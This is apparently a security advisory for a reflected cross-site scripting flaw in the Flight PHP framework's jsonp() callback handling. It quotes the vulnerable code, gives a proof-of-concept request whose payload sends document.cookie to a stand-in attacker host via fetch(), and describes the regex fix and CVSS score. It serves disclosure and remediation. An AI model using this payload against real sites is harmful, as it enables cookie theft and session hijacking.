Flight::jsonp() concatenates the ?jsonp= query parameter directly into an application/javascript response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting.
flight/Engine.php (≈ lines 1000-1013):
$callback = $this->request()->query[$param];
$this->response()
->status($code)
->header('Content-Type', 'application/javascript; charset=' . $charset)
->write($callback . '(' . $json . ');');
No regex or identifier validation is performed before the callback is written.
Given any route that calls Flight::jsonp($data):
GET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//
Reproduced response (Content-Type: application/javascript):
;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({"ok":true,"msg":"hello"});
When the vulnerable endpoint is loaded via <script src="https://victim.tld/api?jsonp=…"> on a page controlled by the attacker, the injected JavaScript executes in the victim.tld origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow.
Flight::jsonp().3.18.1, commit b8dd23a)_jsonp() now validates the callback name against ^[A-Za-z_$][\w$.]{0,127}$ before emitting it. An empty callback (no jsonp parameter) still behaves as before.
Discovered by @Rootingg.
3.18.1Exploitability
AV:NAC:LAT:NPR:NUI:PVulnerable System
VC:HVI:HVA:NSubsequent System
SC:LSI:LSA:N8.6/CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N